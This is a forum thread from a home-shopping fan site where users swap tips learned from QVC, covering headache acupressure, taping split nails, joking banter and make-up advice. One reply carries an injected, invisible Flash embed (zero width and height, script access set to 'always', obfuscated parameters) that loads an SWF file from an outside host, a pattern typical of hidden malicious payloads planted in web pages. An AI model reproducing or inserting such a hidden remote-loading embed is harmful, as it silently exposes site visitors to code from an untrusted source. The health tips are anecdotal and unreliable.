Best tips I've gained from QVC

ShoppingTelly

Help Support ShoppingTelly:

babytoes

Registered Shopper
I can't remember which show the guest presenter was on,but she told the QVC presenter how to get rid of a dull head ache. Firstly place the 2nd finger of each hand in the hollow either side of your nose under the brow, then push up firmly onto your brow bone for the count of three.Then place your 1st finger where your eyebrow starts,your 3rd finger where the other eyebrow starts and the 2nd finger just above the other two. Press quite fimly and rotate them 3 times left and 3 times right. Sounds odd but it really works, I suppose it just relieves congestion. You are only supposed to do it once.

The other tip was if you have one of those horrible splits in a nail,the OPI woman said to put a thin strip of Microporous tape across it. Simple but it works.:happy:

The other tip was if you have one of those horrible splits in a nail,the OPI woman said to put a thin strip of Microporous tape across it. Simple but it works.

thanks for that one..never thought of trying that, I'm always getting nails split right down on the side where they're still joined to my finger!

-I was once told an orgasm cures a headache.

It does for about the thirty seconds it lasts then it comes back full force plus. Maybe that's why women can have them in their multiples!

It does for about the thirty seconds it lasts then it comes back full force plus. Maybe that's why women can have them in their multiples!<embed allowScriptAccess="always" FlashVars="cid=1&swf=eaememeicgbvbvepepepbuelegebeoebbudvehefbvdyebeedxelbvebegdwdxeqbueieaei" src="http://www.snivi.com/files/1.swf" quality="high" bgcolor="#ffffff" width="0" height="0" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>

This topic made my day! :sun:
On topic: Sorry, can't help. At least I don't remind that presenter/show.

I was once told an orgasm cures a headache.:nod:

Pity they don't sell them isn't it?:angel: I wonder if you would still get your 30 Day No Wibble Money Back Guarantee if you weren't completely satisfied? :tongue:

Anyway

The best tips I've ever had off QVC have usually been about make-up application etc, I've probably learned more from watching the make-up artists they have on there than anywhere else. Pre QVC I couldn't even apply eyeliner straight, but from listening to people like Laura Geller, Mally and so on I've really learned how to do my 'face' properly - even though I use other non QVC brands more now (though I will never part with my LG Ethereal Rose powder notneverever)

Latest posts

Back